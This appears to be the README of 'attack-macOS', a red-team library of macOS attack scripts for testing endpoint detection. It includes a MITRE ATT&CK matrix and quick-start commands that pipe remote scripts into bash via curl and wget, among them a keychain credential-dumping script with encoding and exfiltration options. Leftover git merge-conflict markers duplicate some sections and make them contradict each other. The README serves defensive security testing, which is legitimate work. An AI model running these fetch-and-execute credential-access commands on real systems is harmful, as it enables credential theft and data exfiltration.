-grey?style=for-the-badge){kind=icon}
-grey?style=for-the-badge){kind=icon}
ATT&CK Matrix •
Key Features •
Quick Start •
Integrations
<<<<<<< HEAD Attack-macOS offers scripts for security teams to evaluate macOS endpoint detection and response. It simplifies executing Living Off The Orchard (LOObins) techniques via standalone scripts with built-in data handling (encoding, encryption, formatting, logging) and exfiltration (DNS, HTTP/S).
Attack-macOS provides scripts for security teams to evaluate macOS endpoint detection and response capabilities. This project executes Living Off The Orchard (LOLBins) techniques via standalone scripts with built-in encoding, encryption, formatting, logging, and exfiltration over DNS and HTTPS.
c6f83ff (cleanup work)
flowchart TD
A1("🚫 Limited OSS testing tools")
A2("⚡ Existing tools are tier II/III (advanced C2s)")
A3("🛡️ Commercial tools focus on hardening and MDM")
style A1 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A2 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A3 stroke:#ff6b35,stroke-width:2px,fill:transparent
flowchart TD
A4("📊 Limited technique and procedure coverage")
A5("❓ Known risks are not common knowledge")
A6("🔧 Hard to operationalize test pipelines")
style A4 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A5 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A6 stroke:#ff6b35,stroke-width:2px,fill:transparent
flowchart TD
A1("✓ Build a library of attack scripts that help security teams evaluate and improve macOS endpoint detection and response capabilities.")
style A1 stroke:#90EE90,stroke-width:2px,fill:transparent
| Feature | Description | Benefit |
|---|---|---|
| <<<<<<< HEAD | ||
| Builder Tool | YAML template, schema, and builder tool for new scripts with built-in argument parsing/validation. Parse Args | Reduces script development time and errors via automated validation. |
| Modular Design | Self-contained scripts for independent use or easy integration with security test frameworks. | Allows quick deployment without complex toolchains. |
| Standardized Help | All scripts include --help menus for standalone or handler-based execution. |
Speeds up execution by reducing documentation lookup. |
| macOS Native | TTPs primarily use native macOS command-line binaries and APIs (LOObins) via shell scripts. Some TTPs use osascript (for JXA/AppleScript), python3, or swift for specific tasks or wrappers. The attackmacos.sh handler has minimal dependencies. |
Produces realistic macOS telemetry by leveraging system utilities and scripting languages. |
| MITRE ATT&CK Mapped | Scripts and arguments map directly to the MITRE ATT&CK framework. | Aids compliance reporting and threat model alignment. |
| Logging | Syslog logging with JSON/CSV output formatting. Log Output | Automates evidence collection; speeds up post-test analysis. |
| Encoding and Encryption | Offers multiple data encoding (Base64, Hex, Perl) and encryption (AES, GPG, XOR) options. Encode Output • Encrypt Output | Simulates evasion techniques for improved test realism. |
| Exfiltration | Simulates data exfiltration via HTTP/S and DNS. Exfiltrate Data | Tests attack chains to find data loss prevention gaps. |
| CI/CD Pipeline Ready | Integrates with security tools, automation pipelines, and CI/CD workflows. | Supports continuous security testing with less manual effort. |
| Caldera Integration | Native Caldera plugin for integration with red team operations. Caldera Plugin | Streamlines Caldera deployment and execution for red teams. |
| ======= | ||
| YAML-First Configuration | Each technique defined in YAML with complete metadata, arguments, and MITRE ATT&CK mapping | Automated ability generation and consistent deployments |
| Modular Design | Self-contained scripts that work independently or combined, integrate with existing security test frameworks | Quick deployment without complex tool chains or infrastructure changes |
| Standardized Help | All scripts include --help menus for standalone execution via custom deployment frameworks |
Execute without documentation lookup |
| macOS Native | Uses native tools and interpreters without external dependencies. See LOLBins | Produces macOS telemetry attributed to threat actors |
| MITRE ATT&CK Mapped | All scripts and arguments mapped to MITRE ATT&CK framework with proper technique IDs and names | Compliance reporting and threat model alignment |
| Multiple Output Formats | JSON, CSV output formatting for analysis and integration | Evidence collection and post-test analysis |
| Encoding and Encryption | Multiple data encoding options and encryption functions including AES-256-CBC, GPG, and XOR | Test realism using evasion techniques |
| Exfiltration | Data exfiltration via HTTP/S or DNS protocols | Test complete attack chains and identify detection gaps in data loss prevention |
| CI/CD Pipeline Ready | Integrates with existing security tools, automation pipelines, and CI/CD workflows | Continuous security testing without manual intervention |
c6f83ff (cleanup work)
flowchart TD
A( 1: Choose your procedure script) --> A1("🐚 Shell Scripts")
A --> A2("🟡 JXA Scripts")
A --> A3("🐍 Python Scripts")
A --> A4("🦉 Swift Scripts")
A1 --> B( 2: Choose Delivery Method)
A2 --> B
A3 --> B
A4 --> B
B --> B1("🏠 Local ")
B --> B2("☁️ Remote from GGH</br>curl</br>wget</>osascript ")
B1 --> C(3: Execute</br>T1634: Dump Keys)
B2 --> C
C --> C1("📋 Format")
C --> C2("🔧 Encode")
C --> C3("🔐 Encrypt")
C --> C4("📡 Exfiltrate")
C1 --> D("📋 Log and<br>🔍Analyze Events")
C2 --> D
C3 --> D
C4 --> D
D --> D1("🎯 Identify Endpoint</br>Detection Gaps")
style A1 fill:transparent,stroke:#6140E0,stroke-width:2px
style A2 fill:transparent,stroke:#C7B300,stroke-width:2px
style A3 fill:transparent,stroke:#3BC05A, stroke-width:2px
style A4 fill:transparent,stroke:#47B7F8, stroke-width:2px
style A fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style B fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style C fill:#0D0D0D,stroke:#EB5454,stroke-width:2px,color:#fff
style D fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style D1 fill:#1a237e,stroke:#47B7F8,stroke-width:2px,color:#fff
Note on Script Execution: When attackmacos.sh executes scripts remotely (e.g., via --method curl), it downloads the script and runs it using sh. If you intend to run a JXA, Python, or Swift script from a remote source using the handler, ensure the remote URL points to a shell script that acts as a wrapper to correctly execute the JXA/Python/Swift code (e.g., by calling osascript -l JavaScript <file>, python3 <file>, or swift <file>). The --method osascript also invokes a shell script, wrapping the execution within an AppleScript do shell script command. For local execution, TTPs typically consist of shell scripts that may, in turn, execute code in other languages.
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command And Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|
 External Remote Services |
 Shared Modules |
 Socket Filters |
 Boot or Logon Initialization Scripts |
Socket Filters |
 Adversary-in-the-Middle |
 System Owner/User Discovery |
 VNC |
 Archive via Utility |
Socket Filters |
 Exfiltration Over Web Service |
 Disk Structure Wipe |
 Compromise Software Dependencies and Development Tools |
 JavaScript |
Boot or Logon Initialization Scripts |
 Path Interception by PATH Environment Variable |
 Embedded Payloads |
 Pluggable Authentication Modules |
 Internet Connection Discovery |
 Taint Shared Content |
 Screen Capture |
 Standard Encoding |
 Exfiltration Over Webhook |
 Direct Network Flood |
 Spearphishing Link |
 Malicious File |
Pluggable Authentication Modules |
 Create or Modify System Process |
Pluggable Authentication Modules |
 Keylogging |
 Permission Groups Discovery |
 SSH |
Adversary-in-the-Middle |
 Domain Generation Algorithms |
 Scheduled Transfer |
 External Defacement |
 Spearphishing Attachment |
 Cron |
Path Interception by PATH Environment Variable |
 LC_LOAD_DYLIB Addition |
 File/Path Exclusions |
 Password Guessing |
 Device Driver Discovery |
 SSH Hijacking |
Keylogging |
 DNS |
 Exfiltration Over Other Network Medium |
 OS Exhaustion Flood |
 Compromise Hardware Supply Chain |
 Scheduled Task/Job |
Create or Modify System Process |
 Sudo and Sudo Caching |
 Linux and Mac File and Directory Permissions Modification |
 OS Credential Dumping |
 Domain Account |
 Remote Services |
 Audio Capture |
 Symmetric Cryptography |
 Exfiltration Over Bluetooth |
 Application Exhaustion Flood |
 Supply Chain Compromise |
 AppleScript |
External Remote Services |
 Boot or Logon Autostart Execution |
Path Interception by PATH Environment Variable |
 Steal Web Session Cookie |
 Local Account |
 Remote Service Session Hijacking |
 Archive via Custom Method |
 Fast Flux DNS |
 Automated Exfiltration |
 Disk Wipe |
 Exploit Public-Facing Application |
 Native API |
LC_LOAD_DYLIB Addition |
Cron |
 Email Hiding Rules |
 Securityd Memory |
 System Checks |
 Software Deployment Tools |
 Email Collection |
 Application Layer Protocol |
 Exfiltration Over Symmetric Encrypted Non-C2 Protocol |
 Stored Data Manipulation |
 Content Injection |
 Command and Scripting Interpreter |
Boot or Logon Autostart Execution |
Scheduled Task/Job |
 Encrypted/Encoded File |
 Password Cracking |
 Domain Groups |
 Exploitation of Remote Services |
 Data from Removable Media |
 Remote Access Software |
 Exfiltration to Code Repository |
 Service Stop |
 Default Accounts |
 Launchctl |
Cron |
 Login Hook |
 Rootkit |
 Keychain |
 System Service Discovery |
 Internal Spearphishing |
 Local Data Staging |
Content Injection |
 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
 Application or System Exploitation |
 Trusted Relationship |
 XPC Services |
Scheduled Task/Job |
 Process Injection |
Sudo and Sudo Caching |
 Password Managers |
 Network Sniffing |
 Lateral Tool Transfer |
 Automated Collection |
 Traffic Signaling |
 Exfiltration Over C2 Channel |
 Runtime Data Manipulation |
 Phishing |
 User Execution |
 Browser Extensions |
 Launch Daemon |
 Match Legitimate Name or Location |
Network Sniffing |
 Network Share Discovery |
 Clipboard Data |
 Protocol Tunneling |
 Exfiltration Over Alternative Protocol |
 Reflection Amplification |
|
 Valid Accounts |
Software Deployment Tools |
Login Hook |
Default Accounts |
 Masquerade File Type |
 Steal or Forge Kerberos Tickets |
 Peripheral Device Discovery |
 Remote Data Staging |
 Mail Protocols |
 Exfiltration over USB |
 Service Exhaustion Flood |
|
 Spearphishing Voice |
 Unix Shell |
Traffic Signaling |
 Trap |
 Hide Artifacts |
 Credentials from Password Stores |
 System Information Discovery |
 Data from Local System |
 Communication Through Removable Media |
 Exfiltration to Text Storage Sites |
 Defacement |
|
 Compromise Software Supply Chain |
 Inter-Process Communication |
Launch Daemon |
 Dynamic Linker Hijacking |
System Checks |
 Unsecured Credentials |
 Wi-Fi Discovery |
 Archive via Library |
 External Proxy |
 Exfiltration to Cloud Storage |
 Financial Theft |
|
 Domain Accounts |
 Exploitation for Client Execution |
 Web Shell |
 Abuse Elevation Control Mechanism |
 Clear Linux or Mac System Logs |
 Credentials from Web Browsers |
 Application Window Discovery |
 Archive Collected Data |
 Proxy |
 Data Transfer Size Limits |
 Internal Defacement |
|
 Hardware Additions |
 Python |
Default Accounts |
 Setuid and Setgid |
 Stripped Payloads |
 DHCP Spoofing |
 Time Based Evasion |
DHCP Spoofing |
 Dynamic Resolution |
 Exfiltration Over Physical Medium |
 Data Manipulation |
|
 Drive-by Compromise |
 System Services |
Trap |
 SSH Authorized Keys |
 Gatekeeper Bypass |
 Private Keys |
 Browser Information Discovery |
 Web Portal Capture |
 Web Service |
 Exfiltration Over Unencrypted Non-C2 Protocol |
 Account Access Removal |
|
 Spearphishing via Service |
 Visual Basic |
Dynamic Linker Hijacking |
 Login Items |
 Code Signing |
 Password Spraying |
 System Network Configuration Discovery |
 Video Capture |
 DNS Calculation |
 Data Encrypted for Impact |
||
 Local Accounts |
 Malicious Link |
 Local Account |
 Emond |
 Break Process Trees |
Web Portal Capture |
 Account Discovery |
 Email Forwarding Rule |
 Multi-Stage Channels |
 Endpoint Denial of Service |
||
 At |
SSH Authorized Keys |
 Account Manipulation |
 Clear Network Connection History and Configurations |
 Steal or Forge Authentication Certificates |
 File and Directory Discovery |
 Data Staged |
 Port Knocking |
 Resource Hijacking |
|||
 Domain Account |
 Kernel Modules and Extensions |
 Clear Command History |
 Bash History |
 System Network Connections Discovery |
 GUI Input Capture |
 File Transfer Protocols |
 Transmitted Data Manipulation |
||||
 Component Firmware |
 Hijack Execution Flow |
 Deobfuscate/Decode Files or Information |
 Credentials In Files |
 Virtualization/Sandbox Evasion |
 Data from Network Shared Drive |
 One-Way Communication |
 Data Destruction |
||||
 Pre-OS Boot |
Valid Accounts |
 Impair Defenses |
 Web Cookies |
 Log Enumeration |
 Input Capture |
 Multi-hop Proxy |
 Network Denial of Service |
||||
Login Items |
 Exploitation for Privilege Escalation |
 Masquerading |
 Forge Web Credentials |
 Process Discovery |
 ARP Cache Poisoning |
 Data Obfuscation |
 Firmware Corruption |
||||
Port Knocking |
 Event Triggered Execution |
 Clear Mailbox Data |
 Multi-Factor Authentication Request Generation |
 User Activity Based Checks |
 Data from Information Repositories |
 Non-Standard Port |
 Inhibit System Recovery |
||||
 Compromise Host Software Binary |
 Unix Shell Configuration Modification |
Process Injection |
 Exploitation for Credential Access |
 Local Groups |
 Encrypted Channel |
 Disk Content Wipe |
|||||
Emond |
 Elevated Execution with Prompt |
Traffic Signaling |
GUI Input Capture |
 Password Policy Discovery |
 Bidirectional Communication |
 System Shutdown/Reboot |
|||||
Account Manipulation |
 Startup Items |
 System Binary Proxy Execution |
 Brute Force |
 System Language Discovery |
 Asymmetric Cryptography |
||||||
Kernel Modules and Extensions |
Domain Accounts |
 Timestomp |
 Credential Stuffing |
 System Location Discovery |
 Non-Application Layer Protocol |
||||||
Hijack Execution Flow |
 Launch Agent |
 Reflective Code Loading |
 Multi-Factor Authentication |
 Security Software Discovery |
 Protocol Impersonation |
||||||
Valid Accounts |
 Installer Packages |
 Ignore Process Interrupts |
Input Capture |
 Remote System Discovery |
 Domain Fronting |
||||||
Multi-Factor Authentication |
 RC Scripts |
Time Based Evasion |
ARP Cache Poisoning |
 Network Service Discovery |
 Data Encoding |
||||||
Event Triggered Execution |
 Re-opened Applications |
 Disable or Modify System Firewall |
 Multi-Factor Authentication Interception |
 Software Discovery |
 Non-Standard Encoding |
||||||
Unix Shell Configuration Modification |
 TCC Manipulation |
 Electron Applications |
 Modify Authentication Process |
 Debugger Evasion |
 Web Protocols |
||||||
Startup Items |
At |
 Code Signing Policy Modification |
 System Time Discovery |
 Ingress Tool Transfer |
|||||||
Domain Accounts |
 Dylib Hijacking |
 Binary Padding |
 Hide Infrastructure |
||||||||
Launch Agent |
Local Accounts |
Default Accounts |
 Steganography |
||||||||
 Server Software Component |
Dynamic Linker Hijacking |
 Fallback Channels |
|||||||||
Installer Packages |
 File and Directory Permissions Modification |
 Internal Proxy |
|||||||||
RC Scripts |
Abuse Elevation Control Mechanism |
 Dead Drop Resolver |
|||||||||
 Create Account |
Setuid and Setgid |
 Junk Data |
|||||||||
Re-opened Applications |
 Indicator Blocking |
||||||||||
 Power Settings |
 Right-to-Left Override |
||||||||||
At |
Component Firmware |
||||||||||
Modify Authentication Process |
 Indicator Removal |
||||||||||
Dylib Hijacking |
 Masquerade Task or Service |
||||||||||
Local Accounts |
 Plist File Modification |
||||||||||
Pre-OS Boot |
|||||||||||
 Downgrade Attack |
|||||||||||
Virtualization/Sandbox Evasion |
|||||||||||
 Execution Guardrails |
|||||||||||
Port Knocking |
|||||||||||
 Hidden Users |
|||||||||||
 Impair Command History Logging |
|||||||||||
User Activity Based Checks |
|||||||||||
 Disable or Modify Tools |
|||||||||||
Hijack Execution Flow |
|||||||||||
 Indicator Removal from Tools |
|||||||||||
Valid Accounts |
|||||||||||
 Resource Forking |
|||||||||||
 Obfuscated Files or Information |
|||||||||||
Multi-Factor Authentication |
|||||||||||
 Invalid Code Signature |
|||||||||||
 Run Virtual Instance |
|||||||||||
 Subvert Trust Controls |
|||||||||||
Elevated Execution with Prompt |
|||||||||||
 Rename System Utilities |
|||||||||||
 Spoof Security Alerting |
|||||||||||
 Steganography |
|||||||||||
Domain Accounts |
|||||||||||
 Install Root Certificate |
|||||||||||
 Compile After Delivery |
|||||||||||
 VBA Stomping |
|||||||||||
 Impersonation |
|||||||||||
 Hidden Window |
|||||||||||
 Clear Persistence |
|||||||||||
 HTML Smuggling |
|||||||||||
 Command Obfuscation |
|||||||||||
 File Deletion |
|||||||||||
 Software Packing |
|||||||||||
 Hidden File System |
|||||||||||
Debugger Evasion |
|||||||||||
 Space after Filename |
|||||||||||
TCC Manipulation |
|||||||||||
 Hidden Files and Directories |
|||||||||||
 Environmental Keying |
|||||||||||
Modify Authentication Process |
|||||||||||
Dylib Hijacking |
|||||||||||
Local Accounts |
|||||||||||
 Exploitation for Defense Evasion |
# 1. Clone the repository
git clone https://github.com/armadoinc/attack-macOS.git
cd attack-macOS
# 2. Local execution using the handler
./attackmacos/attackmacos.sh --method local --tactic discovery --ttp browser_history --args='-s'
# 3. Remote execution using the handler
./attackmacos/attackmacos.sh --method curl --tactic credential_access --ttp keychain --args='--verbose --encode base64'
# 4. List available TTPs for a tactic
./attackmacos/attackmacos.sh --list-local --tactic discovery
./attackmacos/attackmacos.sh --list-remote --tactic credential_access
# 5. Show banner and help
./attackmacos/attackmacos.sh --banner --help<<<<<<< HEAD
The ./attackmacos/attackmacos.sh handler script requires:
- A POSIX-compliant shell (e.g., bash, zsh, sh).
curlorwgetfor remote script execution (when using--method curlor--method wgetrespectively).osascriptif using the--method osascript(this is a standard component of macOS).
# 1. Build and sync Caldera plugin
python cicd/build_shell_procedure.py --sync-caldera
# 2. Copy plugin to Caldera
cp -r integrations/caldera/plugins/attackmacos /path/to/caldera/plugins/
# 3. Restart Caldera server
# Caldera operations will then include the plugin abilities.
# 4. Use with facts in Caldera
# Set fact: user.arg = "--safari --chrome --search malware"
# Execute ability: browser_historyCaldera Documentation: Caldera Plugin Guide
=======
c6f83ff (cleanup work)
# 1. Clone the repository
git clone https://github.com/armadoinc/attack-macOS.git
cd attack-macOS
# 2. Run a technique directly
./ttp/discovery/shell/system_info.sh
# 3. Run with custom parameters
./ttp/credential_access/shell/keychain.sh --verbose --log-output --encode base64
# 4. Use the builder to create custom scripts
cd tools
python3 build_shell_procedure.py --input ../attackmacos/ttp/discovery/shell/system_info.yml --output ../custom_scripts/# 1. Execute directly from GitHub without cloning
curl -s https://raw.githubusercontent.com/armadoinc/attack-macOS/main/ttp/discovery/shell/system_info.sh | bash
# 2. Download and execute with parameters
curl -s https://raw.githubusercontent.com/armadoinc/attack-macOS/main/ttp/credential_access/shell/keychain.sh | bash -s -- --verbose --log-output --encode base64
# 3. Execute specific technique with wget
wget -qO- https://raw.githubusercontent.com/armadoinc/attack-macOS/main/ttp/discovery/shell/browser_history.sh | bashRepository: https://github.com/armadoinc/caldera-plugin-attack-macos
Native Caldera plugin for seamless integration with red team operations. The plugin transforms attack-macOS YAML configurations into ready-to-execute abilities using a full command approach.
Apache License 2.0. LICENSE